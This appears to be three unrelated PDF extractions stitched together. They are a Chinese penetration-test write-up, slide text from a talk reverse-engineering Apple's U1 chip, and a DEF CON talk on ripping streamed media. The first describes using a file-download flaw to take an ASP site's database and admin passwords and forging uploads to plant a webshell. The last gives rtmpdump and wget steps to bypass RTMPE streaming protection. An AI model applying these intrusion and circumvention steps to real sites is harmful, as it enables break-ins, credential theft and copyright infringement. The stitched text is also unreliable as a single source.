60010:"hbase.master.info.bindAddress",
任意文件下载
敏感信息主要是后台目录、备份文件、上传目录路径、安装页面以及信息泄露phpinfo文件、管理
组件phpmyadmin相关的信息。搜集敏感信息借助google搜索引擎的hacking语法,能搜索很多有
用的线索。
这次实操是在一个asp页面里发现了PDF文件下载,然后改成相对路径可以下载任意ASP文件:
目录扫描得到管理员后台URI admin/index.asp
从管理员后台的index.asp页面获取配置文件位置,因为这个用户登录页面都会用到SQL语句查询管
理员帐户密码,所以会有调用数据库的配置文件。
而ASP网站用了MDB数据库,没有做防下载,用前面的任意下载文件漏洞拿到.mdb数据库配置文
件,可以拿到数据库里的管理员密码。
任意文件上传
得到admin/index.asp页面,我就已经把HTML页面,A标签属性里的asp文件都分析了一下。发现有
上传文件的模块。顺着地址访问,只有一个输入框,但是查看源码发现input标签里加了隐藏属
性,抓包还是可以看得到字段的。结合前面的任意文件下载漏洞,分析文件上传的asp源码,构造
上传文件数据包,就可以不用进入后台,上传webshell了。
这是文件上传的部分代码。为了方便理解,把多余代码省略了。
<form action="upload.asp" method="post" enctype="multipart/form‐dat
a" name="form1">
<input type="file" name="file">
<input type="submit" name="Submit" value="submit">
</form>
想要了解上传文件的过程,首先要理解HTML传过来的POST包结构。
1)第一部分(起始标志)
‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐7dc18645076a
2)第二部分(文件说明)
Content‐Disposition: form‐data; name="file1"; filename="E:\1111.jpg"
Content‐Type: application/msword
3)第三部分(文件内容)
文件的二进制内容,略
4)第四部分(结束标志)
‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐7dc18645076a
ASP代码注释如下:
Dim filesize, filedata, PostData
'filesize是上传文件的大小
filesize = Request.TotalBytes
'bytArray是上传文件的二进制数据
bytArray = Request.BinaryRead(filesize)
' 借助RecordSet将二进制流转化成文本
Set rstTemp = Server.CreateObject("ADODB.Recordset")
rstTemp.Fields.Append "bytArray", adLongVarChar, lenb(bytArray)
rstTemp.Open
rstTemp.AddNew
rstTemp.Fields("bytArray").AppendChunk bytArray
rstTemp.Update
' we have getted the original string
strByteToString = rstTemp("bytArray")
Set rstTemp=Nothing
.....多余代码略过.....
' 获取二进制文件内容
strInputContent = Mid(strByteToString, lngStartPos, InStr(lngStartPos, strB
yteToString, strIDInput) ‐ 2 ‐ lngStartPos)
.....多余代码略过.....
' 保存文件内容
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile(withName , True)
if Err.number = 0 then
tf.Write(pContent)
tf.Close
end if
然后根据字段就可以构造HTML表单,抓包改包内容和文件名。上传路径写死在asp文件上传模块
的变量里。
写的小工具扩展
手动去查谷歌结果也是可以的。公开的爬虫小工具有多,近几年跟谷歌反爬机制,网页元素变动有
关,都不更新了。既然是获取google结果,在浏览器执行js语句更方便。我写了个简陋的chrome
浏览器扩展,获取google搜索结果的效果如下。:
核心JavaScript代码。
var s = document.getElementById("search");
var r = s.getElementsByTagName("div");
var d = r[0].getElementsByTagName("div");
var e = d[0].getElementsByClassName("g"); //g
var str = '\n';
console.log(str);
for(var i=0;i< e.length;i++)
{
var g = e[i].getElementsByTagName("div");
var f = g[0].getElementsByTagName("div");
var x = f[0].getElementsByTagName("div");
str = str + x[0].getElementsByTagName('a')[0].href + '\n';
}
console.log(str);
ASP有点老了,不知道为何还会有这么网站在用。分享出来复盘做下过往总结,有很多语句不顺的
地方,打码比较厚实的地方。是为了保护星球,也是为了保护自己。请多担待。
同时,欢迎大家关注"公鸡队之家"这个知识星球,营造一个攻击队的技术交流氛围,一个专业、前
沿、原创、不违法的红队/蓝军讨论社区,不水贴、不搬运链接,杜绝广告与招聘,做纯粹的技术
分享和技术交流。,与大家一起进步。
历史回顾
实战1‐越权漏洞反制钓鱼网站
实战2‐文件上传反制跳板站点
参考
https://www.cnblogs.com/liuxianan/p/chrome‐plugin‐develop.html
https://developer.chrome.com/extensions/content_scripts | pdf |
Wibbly Wobbly, Timey Wimey
What's Really Inside Apple's U1 Chip
Jiska Classen
Secure Mobile Networking Lab - SEEMOO
Technical University of Darmstadt, Germany
Alexander Heinrich
Secure Mobile Networking Lab - SEEMOO
Technical University of Darmstadt, Germany
Ultra Wideband (UWB) U1 Chip
Nobody knows what
it is or does
Only available in the latest
generation of devices
Must be
hacker-proof!
Non-interceptable with
cheap SDRs
UWB Secure Ranging & NLOS Distance Measurement
Line of sight distance
<3 meters, open door.
Strongest path is non
line of sight… #?$%!
UWB Secure Ranging & NLOS Distance Measurement
For more details, see WiSec 2021 paper “Security Analysis of IEEE 802.15.4z/HRP UWB Time-of-Flight Distance Measurement” by Singh et. al.
Somewhat
UWB Features
20”
90º
20”
90º
Nearby Interaction
Find My
UWB to X
UWB to X
UWB Internals
UWB System Architecture
AirDrop
UWB Beaconing
+
AirDrop Protocol
AirDrop Bluetooth Discovery
Length
AirDrop
Zero padding
Version
Hash #1
Hash #2
Hash #3
Hash #4
Random non-resolvable
MAC address
Stute et al. (2019). A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link.
Celosia et al. (2020). Discontinued Privacy: Personal Data Leaks in Apple Bluetooth-Low-Energy Continuity Protocol
05 12 00000000 00000000 01 ac5b d44e a87b dafe 00
UWB Bluetooth Discovery
0f 05 a0 35 eed4de
Length
Authentication tag
Action Type: Point To Share
Action Flags
Nearby Action
Random resolvable MAC
address
Martin et al. (2019). Handoff All Your Privacy – A Review of Apple’s Bluetooth Low Energy Continuity Protocol
Celosia et al. (2020). Discontinued Privacy: Personal Data Leaks in Apple Bluetooth-Low-Energy Continuity Protocol
UWB Bluetooth Discovery
0f 05 a0 35 eed4de
sharingd
✅ Nearby device detected
✅ UWB Point To Share
MAC address
Authentication Tag Validation
0f 05 a0 35 eed4de
sharingd
✅ Nearby device detected
✅ UWB Point To Share
✅ Validate Auth Tag
MAC address
SipHash( , IRK) = Auth Tag
MAC address
UWB Bluetooth Discovery
0f 05 a0 35 eed4de
sharingd
✅ Nearby device detected
✅ UWB Point To Share
✅ Validate Auth Tag
MAC address
nearbyd
MAC address
Initiate ranging
Whitelist UWB MAC
address
rapportd
U1
AirDrop Ranging
UWB Ranging and Angle
measurements
AirDrop Ranging
UWB Ranging and Angle
measurements
Nearby Interaction Framework
Using out of band
communication
Initiator
Responder
Bluetooth discovery
13 04 01 a2b246
13 09 09 219d0c01 0400030c
Length
UWB
Authentication Tag
UWB Config
Authentication Tag
Initiator
Responder
Flags
NIDiscoveryToken
Identity Resolving Key (IRK)
Identifier Data
16 bytes
3 bytes
SipHash( , IRK) = Auth Tag
MAC address
UWB Secure Ranging
Somewhat
UWB Ranging
20”
90º
20”
90º
Time received
Time replied
Time of flight = Time received - Time replied - processing time
Sniffing UWB frames
nearbyd[1184] <Notice>: Built GR packet: {
ses_role: 0
, tx_ant_mask : 2
, rx_ant_mask : 11
, rx_sync_search_ant_mask : 2
, tx_preamble: 3
, rx_preamble: 3
, tx_pkt_type: 0
, rx_pkt_type: 0
, tx_mslot_sz_250us: 12
, rx_mslot_sz_250us: 12
, interval_min_ms: 30
, naccess_slots_min: 1
, naccess_slots_max: 32
, access_slot_idx: 0
, start_channel: 1
, alternate_channel: 0
, channel_hop_pattern_mask: 8
, debug_flags: 7
, start_time: 0
, start_time_uncertainty: 0
, interval_max_ms: 5000
, local_addr: 0x0
, peer_addr: 0x0
, sts_blob: 1281711291571851042031941281011261981431306684
}
Sniffing UWB frames
nearbyd[1184] <Notice>: Built GR packet: {
ses_role: 0
, tx_ant_mask : 2
, rx_ant_mask : 11
, rx_sync_search_ant_mask : 2
, tx_preamble: 3
, rx_preamble: 3
, tx_pkt_type: 0
, rx_pkt_type: 0
, tx_mslot_sz_250us: 12
, rx_mslot_sz_250us: 12
, interval_min_ms: 30
, naccess_slots_min: 1
, naccess_slots_max: 32
, access_slot_idx: 0
, start_channel: 1
, alternate_channel: 0
, channel_hop_pattern_mask: 8
, debug_flags: 7
, start_time: 0
, start_time_uncertainty: 0
, interval_max_ms: 5000
, local_addr: 0x0
, peer_addr: 0x0
, sts_blob: 1281711291571851042031941281011261981431306684
}
Supported preambles codes for 64MHz pulse
repetition frequency
Channel 5: [9, 10, 11, 12]
Channel 9: [9, 10, 11, 12]
Channels supported by U1
[5, 9]
The Right Hardware
The Correct Configuration
Configuration:
Channel
9
Preamble code
12
Start of frame delimiter
likely 802.15.4z-2020
STS format
?
STS length
?
UWB Frame format
Preamble
SFD
SFD = Start of frame delimiter
STS
PHY header
PHY payload
Variable length
STS
PHY header
PHY payload
Variable length
Preamble
SFD
STS
PHY header
PHY payload
Variable length
STS
PHY header
PHY payload
Variable length
Preamble
SFD
STS
PHY header
Variable length
STS
Variable length
Issues
AirDrop
Nearby Interaction
One-to-many ranging
Peer-to-peer ranging
Single sided ranging
Double sided ranging
Likely no STS
Shared secret and STS
AoA and Distance Measurement Ticket Processing
nearbyd
IOKit
RoseControllerLib
Start range and angle estimation
NewServiceRequest
(once)
Rose neural engine sensor fusion
MeasurementTicket
(asynchronous, n times)
U1
Hardware
Interaction
Hardware Components
Application
Processor
~1500 functions, 32-bit RTKit
Digital Signal
Processor
~500 functions, 64-bit RTKit
U1
Rx
Tx
Always-on
Processor
64-bit RTKit
Kernel
💤💤💤 UWBCommsRoute: AP/AOP
Hardware Components - AirTag
Application
Processor
32-bit RTKit
Digital Signal
Processor
64-bit RTKit
U1
Rx
Tx
AirTag Firmware,
BLE+NFC
32-bit, non-RTKit
nRF52832
“Hacking the Apple AirTags”, DEF CON 29 talk by Thomas Roth.
RTKit Operating System
●
RTKitOS runs on almost every Apple chip or embedded device.
○
64-bit variant comes with ASLR.
○
Lightweight, ~100 functions.
○
Even logging is implemented differently in every RTKitOS firmware.
●
RTKitOS debug builds support additional logging.
○
U1 debug builds: iOS 13.3 on iPhone 11 & initial AirTag firmware 🎉
More details about RTKitOS in Apple’s Bluetooth chip and peripherals are documented in Dennis Heinze’s thesis (https://github.com/seemoo-lab/toothpicker).
Duplicate User Clients
Kernel
AppleSPURoseDriverUserClient
AppleSPUUserClient
Kernel Space
Always-on Processor
Hardware
rose
rose-supervisor
IOKit UserClients for RTKit-based chips have equivalents in the AOP.
Same principle for other wireless chips by Apple, e.g., the audioOS AOP implements
marconi-bluetooth and aop-marconi-bt-control to communicate with Apple’s Bluetooth chip.
RTBuddy
RTKit-based chips communicate with an RTBuddy for logging etc.
IOKit
User Space
nearbyd
Apps
Checking RTKit-based Driver Dependencies
# ioreg -rtc IOUserClient
+-o Root <class IORegistryEntry, id 0x100000100, retain 184>
+-o N104AP <class IOPlatformExpertDevice, id 0x10000020f, … >
+-o AppleARMPE <class AppleARMPE, id 0x100000210, … >
+-o arm-io@10F00000 <class IOPlatformDevice, id 0x100000118, … >
… +-o RTBuddyV2 <class RTBuddyV2, id 0x100000374, … >
+-o AOPEndpoint17 <class RTBuddyEndpointService, id 0x1000003a0, … >
+-o AppleSPU@10000014 <class AppleSPU, id 0x1000003dc, … >
+-o rose <class AppleSPUAppInterface, id 0x100000142, … >
+-o AppleSPURoseDriver <class AppleSPURoseDriver, id 0x1000004e4… >
+-o AppleSPURoseDriverUserClient <class AppleSPURoseDriverUserClient, id 0x100000aa3, … >
{
"IOUserClientCreator" = "pid 549, nearbyd"
}
…
+-o AppleSPU@10000020 <class AppleSPU, id 0x1000003e2, … >
+-o rose-supervisor <class AppleSPUHIDInterface, id 0x10000049e, … >
+-o AppleSPUUserClient <class AppleSPUUserClient, id 0x100000aa4, … >
{
"IOUserClientCreator" = "pid 549, nearbyd"
"IOUserClientDefaultLocking" = Yes
}
Find detailed ioreg outputs from current devices on https://github.com/robre/ioreg-archive.
Sending Commands directly to Rose
Kernel Space
Hardware
User Space
nearbyd
Я
IOConnectCallMethod(port, 5, …)
extRoseTx
AppleSPURoseDriverUsCli
The IOKit RoseDriverUserClient exports various functions, but in the end they call
AppleSPUInterface::spuPerformCommand(…) within the kernel, similar to the SPUUserClient.
AppleSPURoseDriverUserClient::extRoseTx(‘0504…’)
AppleSPURoseDriver::performCommand(…)
AppleSPUInterface::PerformCommand(…)
AppleSPUInterface::spuPerformCommand(…)
Raw command, reverse byte order,
means 0x4005.
Command forwarding.
hsi_cmd()
case 0x4005:
…
Always-on Processor
U1 Application Processor
0 extRoseLoadFirmware
1 extRoseGetInfo
2 extRoseReset
3 extRoseEnterCommandMode
4 extRosePing
5 extRoseTx
6 extRoseTimeSync
7 extRoseGetSyncedTime
8 extRoseGetProperty
9 extRoseSetProperty
10 extRosePerformInternalCommand
11 extRoseCacheFirmwareLogs
12 extRoseDequeueFirmwareLogs
13 extRoseTriggerCoredump
14 extRoseDequeueCoredump
15 extRoseCoredumpInfo
16 extRosePowerOn
17 extRoseReadPowerState
18 extRoseConfigureFirmwareLogCache
Sending Commands via the AOP to Rose
Kernel Space
Hardware
User Space
nearbyd
Я
IOConnectCallMethod(port, 1, …)
extSetPropertyMethod
AppleSPUUserClient
AOPRoseSupervisor::setProperty
AOPRoseServiceHandle::SendCommandFIFO
(0x4012, mac_addr, … )
Always-on Processor
mac_cmd()
case 0x4012:
…
U1 Application Processor
The IOKit SPUUserClient sets states and properties in the AOP.
If needed, certain state changes also apply commands to the U1 chip.
AppleSPUUserClient::extSetPropertyMethod(211, ‘0000’ + bd_addr)
…
AppleSPUInterface::spuPerformCommand(…)
R1MacAddress
Concatenate from Bluetooth Address
208 SPMISettings
209 UWBCommsRoute
210 BeaconWhiteList
211 R1MacAddress
212 AllowR1Sleep
213 CalDataPushed
214 CmdQueueClearAllow
215 LogVerbose
216 RoseAOPHello
0 extTestMethod
1 extSetPropertyMethod
2 extGetPropertyMethod
3 extPerformCommandMethod
4 extSetNamedPropertyMethod
5 extGetNamedPropertyMethod
Sending Commands via the AOP to Rose
Kernel Space
Hardware
User Space
nearbyd
Я
IOConnectCallMethod(port, 3, …)
extPerformCommandMethod
AppleSPUUserClient
AOPRoseServiceHandle::AOPGeneralizedRangingJob
Always-on Processor
mac_cmd()
case 0x4025:
…
U1 Application Processor
AppleSPUUserClient::extPerformCommandMethod(‘!’, parameters)
…
AppleSPUInterface::spuPerformCommand(…)
NewServiceRequest
Optional raw parameters
RosePassthrough
! NewServiceRequest
" TriggerRangingStart
# TriggerRangingStop
$ CancelServiceRequest
% HelloCommand
& GetPowerStats
‘ ResetJobs
( APCheckIn
) APGoodbye
* ActivateTimeSync
+ UpdateSessionData
. EmulatedRosePacket
/ EmulatedBTData
Demo: Frida script that decodes interaction
-> NewServiceRequest etc.
GR Packet to Initiate Secure Ranging
nearbyd[1184] <Notice>: RoseScheduler::handleNewServiceRequestInternal
nearbyd[1184] <Notice>: [AP Scheduler] Servicing dequeued service request.
Passing message to AOP scheduler.
nearbyd[1184] <Notice>: Request: [Role]: Initiator, [MacMode]: GR
nearbyd[1184] <Notice>: Built GR packet: {
ses_role: 0
, tx_ant_mask : 2
, rx_ant_mask : 11
, rx_sync_search_ant_mask : 2
, tx_preamble: 3
, rx_preamble: 3
, tx_pkt_type: 0
, rx_pkt_type: 0
, tx_mslot_sz_250us: 12
, rx_mslot_sz_250us: 12
, interval_min_ms: 30
, naccess_slots_min: 1
, naccess_slots_max: 32
, access_slot_idx: 0
, start_channel: 1
, alternate_channel: 0
, channel_hop_pattern_mask: 8
, debug_flags: 7
, start_time: 0
, start_time_uncertainty: 0
, interval_max_ms: 5000
, local_addr: 0x0
, peer_addr: 0x0
, sts_blob: 1281711291571851042031941281011261981431306684
}
- AppleSPUUserClient::extPerformCommandMethod()
> connection 0xa503
> selector 0x3
> input
v
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 21 !
+ NewServiceRequest
v---- IOKit input struct ----
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 30 00 16 00 00 00 04 00 01 13 01 02 00 00 00 00 0...............
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000d0 00 00 00 00 25 40 00 00 00 00 01 04 02 0b 02 01 ....%@..........
000000e0 00 08 03 03 00 00 00 00 00 00 0c 0c 00 00 1e 00 ................
000000f0 88 13 01 20 ff 80 ab 81 9d b9 68 cb c2 80 65 7e ... ......h...e~
00000100 c6 8f 82 42 54 00 00 00 00 00 07 00 00 00 00 00 ...BT...........
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120 00 00 00 00 00 00 00 00 ........
0x80=128, 0xab=171, …, 0x54=84
Firmware Format
U1 Firmware Extraction
Contained in every iOS/audioOS IPSW, watchOS OTA image, or AirTag firmware
image.
/Firmware/Rose/[type]/ftab.bin
Types as of now:
●
iPhone 11 (r1p0)
●
iPhone 12 (r1p1)
●
Apple Watch 6 (r1w0)
●
HomePod mini (r1hp0)
●
AirTag (b389)
The ftab format is also used for other firmware, split it using https://gist.github.com/matteyeux/c1018765a51bcac838e26f8e49c6e9ce.
00000000 01 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ................
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020 72 6b 6f 73 66 74 61 62 03 00 00 00 00 00 00 00 rkosftab........
00000030 72 6b 6f 73 60 00 00 00 e0 98 04 00 00 00 00 00 rkos`...........
00000040 73 62 64 31 40 99 04 00 60 39 04 00 00 00 00 00 sbd1@...`9......
00000050 62 76 65 72 a0 d2 08 00 26 00 00 00 00 00 00 00 bver....&.......
…
000786b0 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 ............ ...
000786c0 52 54 4b 69 74 5f 69 4f 53 2d 31 32 36 34 2e 36 RTKit_iOS-1264.6
000786d0 30 2e 36 2e 30 2e 31 2e 64 65 62 75 67 00 00 00 0.6.0.1.debug...
000786e0 06 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 ................
000786f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Firmware Segments
Application
Processor
~1500 functions, 32-bit RTKit
Digital Signal
Processor
~500 functions, 64-bit RTKit
Contained in the
firmware update
image
Signature
Bound to the chip’s ECID
Appended during
update process
Demo: Show system messages how the chip boots, maybe also an invalid boot
Obtaining Logs
Trigger Rose Error Handling (#1)
case 7:
_os_log_impl( …,
"PRRoseProvider::relayCommandMessage -- SystemOff",
buf_full_packet,
2LL);
…
case 8:
…
"PRRoseProvider::relayCommandMessage -- RefreshConfiguration",
…
PRRoseProvider::relayCommandMessage_RefreshConfiguration_104F70484(a1 + 19);
…
case 9:
…
"PRRoseProvider::relayCommandMessage -- TriggerFatalErrorHandling",
…
log_rose_r1_msg_1021139CC(buf_full_packet, "AOPRoseFatalError");
PRRoseProvider::relayCommandMessage_TriggerFatalErrorHandling_104F72654(…)
…
Can we interact with the firmware without
modifying it?
SystemOff is executed when entering flight
mode, switch this with the implementation of
TriggerFatalErrorHandling.
Get full crash logs and packet logs by setting
isInternalBuild and a few other properties.
Trigger Rose Error Handling (#2)
nearbyd
IOKit
RoseControllerLib
libRoseBooter
Kernel Space
User Space
Mach Messages
Я
RoseControllerLib::TriggerCrashlog(*Controller, 1);
Demo: Show Crash Logs & iOS 13.3 Packet Logs
Conclusion
Lessons Learned
●
Bluetooth and Ultra Wideband are tightly coupled on iOS.
●
Apple’s own RTKit-based wireless chips have an interesting architecture with many
security features like secure boot and ASLR.
●
Many features in the chip can be instrumented from user space.
Q&A
https://github.com/seemoo-lab
Twitter: @naehrdine, @Sn0wfreeze
[jclassen|aheinrich]@seemoo.de
Q&A
https://github.com/seemoo-lab
Twitter: @naehrdine, @Sn0wfreeze
[jclassen|aheinrich]@seemoo.de | pdf |
Ripping Media Off of the Wire
A Step-by-Step Guide
A Step-by-Step Guide
By Honey
[email protected]
whoami: Honey is
a Network Administrator for 4+ years
a Research Assistant for a Ballistic research grant by the
NIST
an Adjunct Professor at John Jay College of Criminal
an Adjunct Professor at John Jay College of Criminal
Justice, located in NYC
gaining her Master’s degree in Forensic Computing
has worked in the IT industry for the past 9+ years.
holds a Computer of Information Systems B.S.
dual A.A.S. degrees in Industrial Electronic Engineering
and Computer Networking
Scope: Download MP3s from
Discussion of lack of security of
“protected streaming” implementations
Tools:
wget version 1.11.4i
Mozilla Firefox version 3.6.3ii
an add-on for Mozilla Firefox called: “HttpFox” version
0.8.4iii
0.8.4iii
rtmpdump version 2.1b for windowsiv
“Convert FLV to MP3 version 1.0”
* All tools used are available for use under the GNU
license. Specific versions are cited although may not
be required
Disclosure:
This presentation describes methods to download
protected materials in an effort raise awareness of
the various weaknesses that exist within each
implementation.
implementation.
All music/media used in this demonstration has the
appropriate permissions for use by the musical artists
themselves.
Any illegal use of the following methods by third
parties is the sole responsibility of the third party.
The author of this presentation bares no legal
responsibility for misuse of said techniques.
Legal Statement:
The following demonstration does violate YouTube‘s terms of
service, MySpace’s terms of service, and the Digital Millennium
Copyright Act, and intellectual property rights, should you
download copyrighted materials.
YOUR USE OF THE INCLUDED TECHNIQUES SHALL BE AT
YOUR OWN RISK.
YOUR OWN RISK.
IN NO EVENT SHALL THE PRESENTER, DEFCON, OR ANY
DEFCON EMPLOYEES, BE LIABLE TO YOU FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, PUNITIVE, OR
CONSEQUENTIAL DAMAGES WHATSOEVER RESULTING
FROM ANY (I) ERRORS, MISTAKES, OR INACCURACIES OF
CONTENT, (II) PERSONAL INJURY OR PROPERTY DAMAGE,
OF ANY NATURE WHATSOEVER, RESULTING FROM YOUR
USE OF THE FOLLOWING TECHNIQUES.
Before We Begin: some thoughts
Not everything is on USENET
Third party plug-ins are not always reliable or kept
current with changes
You got an MD5 sum on that MP3? I didn’t think so!
You got an MD5 sum on that MP3? I didn’t think so!
Third parties could be injecting into your media if you
are trusting them to convert things for you online
**This presentation is not intended to encourage
piracy, but is about the dissemination or data/media
and the failing security methods for “protected
streaming”**
RTMP:
is “Real Time Messaging Protocol” and is a proprietary
protocol developed by Adobe Systems for streaming audio,
video and data over the Internet, between a Flash player
and a server.
and a server.
The RTMP protocol has three variations:
RTMP itself works on top of TCP and uses port number 1935
RTMPT is encapsulated within HTTP requests to traverse firewalls
RTMPS which is RTMP, but over a secure HTTPS connection.
RTMPE:
is “Encrypted Real Time Messaging Protocol” and
is a proprietary protocol created by Macromedia
used for streaming video and DRM. It supposedly
allows secure transfer of data without SSL. It is
allows secure transfer of data without SSL. It is
implemented in flash player 9.0.115 and some
versions of Flash Media Server 3.
Taken From Adobe’s Website
“Defend against replay technologies
Replay technologies, or "stream ripping," has been a
difficult security issue to solve because it allows the
viewer to directly access and record the data of a
viewer to directly access and record the data of a
stream.
Stream encryption prevents stream ripping. In the past,
SSL was the only choice and was too slow for most
applications. With FMS 3, we now have the RTMPE
protocol which is much more efficient and easier
to implement.”
“Flash Media Server communicates with its clients using the Adobe patented,
Real-Time Messaging Protocol (RTMP) over TCP that manages a two-way
connection, allowing the server to send and receive video, audio, and data
between client and server (see Figure 1). In FMS 3, you also have the option to
utilize stronger stream security with encrypted RTMP (RTMPE). RTMPE is easy
to deploy and faster than utilizing SSL for stream encryption. RTMPE is just
one of the robust new security features in FMS 3. (This will be discussed more
in the following sections.)”
Taken from Adobe’s
website, see references.
Adobe Describing DRM:
“Digital rights management
(DRM) has two key elements,
encryption and access control.
There are two ways to deliver
video to a consumer: stream it
Encryption with
Flash Media
Server is done in
real time with
RTMPS (SSL) or
video to a consumer: stream it
or download it. When you
stream video from Flash Media
Server, you immediately
increase your protection.
RTMPS (SSL) or
RTMPE in Flash
Media Server 3.”
Rtmpdump and what it does:
The following text is from the rtmpdump readme:
HTTP gateway: this is an HTTP server that accepts
requests that consist of rtmpdump parameters. It then
connects to the specified RTMP server and returns the
retrieved data in the HTTP response.
retrieved data in the HTTP response.
all subsequent audio/video data received from the
server will be written to a file, as well as being
delivered back to the client.
Let’s Get This Party Started:
Step One: Install your
HttpFox Firefox Plugin.
Step Two: Start
HttpFox and go to the
HowTO: Get mp3 files
from MySpace
HttpFox and go to the
target MySpace page.
For my example, I will be downloading an MP3 from my favorite Brooklyn-based
band called: “Great Tiger”. When I first discovered these guys, their music was
available ONLY on MySpace. Clearly, I wanted to be able to listen to their great
music if my Internet connection went down or something ☺.
Step Three: Sift through the captured traffic.
Do a search for “getSong"
Step Four: Click on the "Content" tab at the bottom of HttpFox. Search through
the XML file until you find a URL ending in “mp3”. Copy the URL. This URL is the
actual location of the file hosted on their servers.
Step Five: Download rtmpdump. Here is the fun
part: The xml url contains: "rtmp://" But they are
really using rtmpe!
Modify the captured URL.
Modify the captured URL.
** You have to replace the leading “rtmp://” to “rtmpe://” and then
run the command:
rtmpdump.exe –r [modified captured URL] –o “my.flv”
Notice how I changed the leading rtmp to rtmpe when I issued the
command within in the command prompt:
Now execute the command and watch the
download start!
Next, watch your download complete! YaY!
Step Six: Convert the “flv” file into an “mp3”.
**if you download the file as an mp3 and not as a flv file and do not
convert it – it has very poor quality. Convert FLV to MP3 resolves this.**
Step Seven:
Listen and
enjoy your
mp3!
Can we see
those steps
again? How
mp3!
again? How
about a quick
video? YES.
Let’s Party Hop Onto the Next One:
Step One: Install your
HttpFox Firefox Plugin.
Step Two: Start
HttpFox and go to the
HowTO: Get mp3 files
from YouTube
HttpFox and go to the
target YouTube video.
For my example, I will be downloading an MP3 from my favorite Brooklyn-based
band called: “Great Tiger”, because I got their permission.
Step Three: Sift through the captured traffic.
Do a search for "get".
Step Four: Copy the URL.
Step Five: Download wget. Modify the URL.
You do not need all of these parameters in the URL.
In fact, if you do not remove the unneeded parameters,
the conversion may fail.
So we want to execute the following command in wget:
So we want to execute the following command in wget:
wget.exe –O [myfilename.flv] “[captured URL]”
But we need to modify the URL to remove the extra
parameters so our mp3 can be converted properly.
Here is the unedited URL we copied from HttpFox. We
can notice several parameters within the URL.
Here is my example URL:
http://www.youtube.com/get_video?el=detailpage&t=vjVQa1Ppc
FP8KGIOjKHxAqlaFMSePaCwB43kjJjoIPw=&fmt=34&video_id=
p3vg33cvJS0&noflv=1&asv=3
The parameters are:
1) get_video?
2) el=detailpage
2) el=detailpage
3) t=some string of characters
4) fmt=34
5) video_id=somestring of characters
6) noflv=1
7) asv=3
****** These parameters are embedded in the URL out of order!!!!! (with
exception to the get_video? parameter) ******
All of the parameters are separated by & symbols, except
the very first parameter which comes directly after the
get_video? parameter.
The URL should be quotes when it is input into wget
The URL does not need a trailing &
Ok, so the only parameters we need from the list of 7 are:
1) get_video?
2) t=some string of characters
3) video_id=somestring of characters
4) asv=3
Original URL:
http://www.youtube.com/get_video?el=detailpage&t=vjVQa1Ppc
It does not matter if parameters 2,3,4 are out of
order. But they must:
•be separated by an &
•come before the “get_video?” parameter
http://www.youtube.com/get_video?el=detailpage&t=vjVQa1Ppc
FP8KGIOjKHxAqlaFMSePaCwB43kjJjoIPw=&fmt=34&video_id=
p3vg33cvJS0&noflv=1&asv=3
Modified URL:
http://www.youtube.com/get_video?t=vjVQa1PpcFP8KGIOjKHx
AqlaFMSePaCwB43kjJjoIPw=&video_id=p3vg33cvJS0&asv=3
Enter in wget.exe –O [filename.flv] “[modified URL]”
Next, watch your download complete! YaY!
Step Six: Convert your “.flv” file into an “mp3” file.
Step Seven:
Listen and
enjoy your
mp3!
Can we see
those steps
again? How
mp3!
again? How
about in a
quick video?
YES.
Conclusion:
DRM implementations will almost always fail without
some type of special hardware on the client computer.
Protected Streaming is supposed to protect digital content from unauthorized
Protected Streaming is supposed to protect digital content from unauthorized
use, this is a DRM technology by Adobe.
Encrypted content by the Flash Media Server "on the fly“ means there is no
encryption of the source file. When data is ready for transmission, either
RTMPE or RTMPS is used…
RTMPE was designed to be simpler than RTMPS which requires an SSL
certificate. But usability is being traded for security because…
Although the CPU-load is less with RTMPE than RTMPS on the Flash Media
Server, there isn't actually any security.
In January 2009, Adobe attempted to fix the security, but there are still
security holes in the design of the RTMPE algorithm itself.!!!
The RTMPE algorithm relies on security through obscurity!!!
RTMPE is vulnerable to Man in the Middle attacks.
Rtmpdump can extract RTMPE streams and Adobe has issued DMCA
takedowns of the tool.
takedowns of the tool.
Maybe Adobe should fix its
protocol instead of issuing
DMCA takedowns of tools…
References and Downloads:
[1] Download wget here: http://www.gnu.org/software/wget/
[1i] Download Mozilla Firefox here: http://www.mozilla.com/en-US/
[1ii] Download the addon HttpFox here:
https://addons.mozilla.org/en-US/firefox/addon/6647/
[iv] Download rtmpdump here: http://rtmpdump.mplayerhq.hu/
[v] ConvertFLVtoMP3 http://www.convertflvtomp3.com
[v] ConvertFLVtoMP3 http://www.convertflvtomp3.com
[vi] RTMP http://www.adobe.com/devnet/rtmp/
[vii] RTMPE http://lkcl.net/rtmp/RTMPE.txt
[viii] MySpace copyrighted logo is a trademark of MySpace, Inc.
